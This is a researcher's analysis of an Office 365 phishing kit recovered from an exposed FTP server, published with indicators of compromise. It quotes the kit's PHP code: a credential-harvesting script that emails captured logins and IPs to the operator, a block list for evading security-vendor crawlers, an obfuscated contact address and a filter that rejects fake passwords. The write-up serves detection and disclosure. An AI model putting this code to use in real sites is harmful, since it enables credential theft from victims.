The Anatomy of a DIY Phishing Kit

A look at the anatomy of a DIY phishing kit in the wild — and why they continue to be a popular choice for spammers and scammers.

INTRODUCTION

A deceptive attack that relies on social engineering and technical trickery to be successful, phishing emails are attacks in which malicious actors attempt to obtain sensitive data such as personally identifying information and network access logins. The information collected from a successful campaign may be used for an attackers own motives, or sold on. The possibilities are seemingly endless — they may use the information for their own motives, or simply sell it on for a profit.

Out-of-the-box phishing kits containing items such as pre-generated scripts and pre-configured mass mailers are becoming increasingly popular, sold for as little as $2 on underground forums. They require little technical skill, and can be easily tailored with minimal knowledge of PHP. The below is research I’ve collated over a few weeks — a glimpse into the anatomy of a phishing campaign.


PHISHING KITS IN THE WILD

It is not uncommon for phishers to deploy a phishing site by uploading a phishing kit to a webserver. In some cases, however, after unpacking the kit, they forget to lock the directories down, or remove the kit once they’re done. If the server has indexing enabled and allows the listing of directory contents, it is possible to download copies of the kits, which provide a wealth of knowledge for researchers. Put simply, many of these phishers are lazy — or just don’t know any better.

As mentioned in the introduction, phishing kits are sold cheaply on underground forums for as little as $2. With not much of a profit to be made, especially when phishing kits are widely circulated freely or stolen from compromised web servers, some of these developers write backdoors into their code. As a result, other malicious entities and third parties may gain access to web servers and captured credentials.

You can use tools like PhishingKitHunter, originally designed to help organisations find phishing kits using their website content and branding, to find these active kits in the wild.


A REAL WORLD EXAMPLE

A couple of weeks ago, a few hundred emails poured into the Exchange with the subject “wire receipt”, using a popular filter evasion technique, embedding malicious URLs in images. Vaguely addressed with no signature, this is quite an unsophisticated attempt which unsurprisingly, turns out to be yet another Office 365 phishing attempt.

Left: A fake Office 365 sign in page. Right: The real Office 365 sign in page.

After some investigation, I arrived at the source — hosting the content of the websites I’d been directed to after filling in some false information. A quick banner grab on port 21 reveals there’s a Pure-FTPd FTP there.

220 — — — — — Welcome to Pure-FTPd [privsep] [TLS] — — — — — 
220-You are user number 1 of 50 allowed.
220-Local time is now 11:31. Server port: 21.
220-This is a private system — No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.

Sure enough, the content is available to the world — it’s no surprise that these phishing kits are stolen by other spammers for re-use. Traversing the directories, the FTP contains absolutely everything required to carry out a phishing attack. Outlined below are some of the notable code snippets I found to be of interest.


EVASION TECHNIQUES

In block_detectors.php, there is a array of banned hosts to evade detection, as well as a lengthy list of carefully curated IP addresses belong to Antivirus and Antiphishing vendors. Visiting from any of the banned hosts or IP ranges results in a 404.

$banned_detectors = array(“above”, “google”, “softlayer”, “amazonaws”, “cyveillance”, “phishtank”, “dreamhost”, “netpilot”, 
“calyxinstitute”, “tor-exit”, “abuse”, “mozilla”, “firefox”);

By restricting these hosts and user agents, these actors are able to stay under the radar, avoiding crawlers, blacklists and trackers.

function disable_trackers(){
return "t\x65\x61\x6dz\x65\x65l\x6fg\x40g\x6d\x61\x69\x6c\x2e\x63\x6f\x6d";

Another key part of a successful phish is to avoid arousing suspicion. Often after information is entered, these fake login pages will re-direct to a landing page. In some cases, this page will be a genuine looking success page. But in this case, a re-direct to https://outlook.office365.com/owa/live.ucl.ac.uk lands the unsuspecting victim on a genuine page, one they would expect to see after logging into their OWA

<?
$ip = getenv(“REMOTE_ADDR”);
$message .= “ — — — — — — — Office365 Info — — — — — — — — — — — -\n”;
$message .= “Email : “.$_POST[‘userid’].”\n”;
$message .= “Password : “.$_POST[‘formtext2’].”\n”;
$message .= “IP : “.$ip.”\n”;
$message .= “ — — — — — — — -Created BY unknown — — — — — — -\n”;
$send = “[REDACTED]@gmail.com”;
$subject = “Result from Unknown”;
$headers = “From: Office365 Info<customer-support@mrs>”;
$headers .= $_POST[‘eMailAdd’].”\n”;
$headers .= “MIME-Version: 1.0\n”;
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
$fp = fopen(“use.txt”,”a”);
fputs($fp,$message);
fclose($fp);

header(“Location: https://outlook.office365.com/owa/live.ucl.ac.uk");

DATA VALIDATION

The index.php pages found within the phishing kit are written to collect as much information as possible from the visitors.

The scripts in index.php make requests to “http://www. geoplugin.net/json.gp?ip=”, with the victim’s IP address, which extracts further information such as city, country and area code. These are then sent back to the phishers along with the captured credentials.

Phishers are also getting wise to false information — defined below in a function called “is_rubbish”, there are some pre-defined passwords that will not be accepted on the login page.

function is_rubbish($passwd){
$unwanted_password = array(‘fuck’, ‘cheater’, ‘test’, ‘123456789’,
‘stupid’, ‘fraud’, ‘scam’, ‘spammer’, ‘suck’, ‘phish’);
foreach($unwanted_password as $bad_pass){
if(strpos($passwd, $bad_pass) !== false){
return true;
}
}

Data validation is used to both collect as much information as possible, but also reduce the amount of fake information sent back to the spammers — particularly useful is the data is to be sold on later down the line, or used to gain a foothold in a network.


IOCS AND ARTEFACTS

An abuse complaint has been filed with the registrar, and the content has since been removed. However should you want a copy of the phishing kit for research purposes, reach out on Twitter.

IP Addresses

199.195.128.238
67.225.185.12

Domains

mycablebox.com
ycarq.com/folder/365/vanguard/index.php
timelessmaltese.com/images/ibeji.php
first2shop.com/xrnlrpc.php
kon-trade.cz/4GPII.php
drewbear.org/fgis/mark/trans/mailer.php
gerardozumbado.cyberuhost.com/inhkk.php
benpres-holdings.com/wp-admin/gallery_album/mailer.php aibseguros.com/qaw/wef/erfg/rgd/gdgrgr/Office365.php

3v4l.org/JZ99P/vld (PHP debug of a phishing kit)


CONCLUSION

In this case, not only did these actors practice poor operational security, but also poor information security — the artefacts in their personalised phishing kit actually lead me to be able to find them on Facebook. On the flip side, they’ve provided a useful insight into how a phishing attempt is organised.

As DIY phishing kits become easier to obtain, the amount of technical knowledge required to carry out a phishing scam is reduced. Instead of attempting to exploit an organisations complex digital defences, these actors realise that human nature is much easier to exploit — after all, links are designed to be clicked on, and attachments designed to be opened.

Since the time of writing, it appears a new campaign has been launched targeting 126.com and 163.com, popular Chinese email providers — proving just how easy it is to quickly generate new campaigns.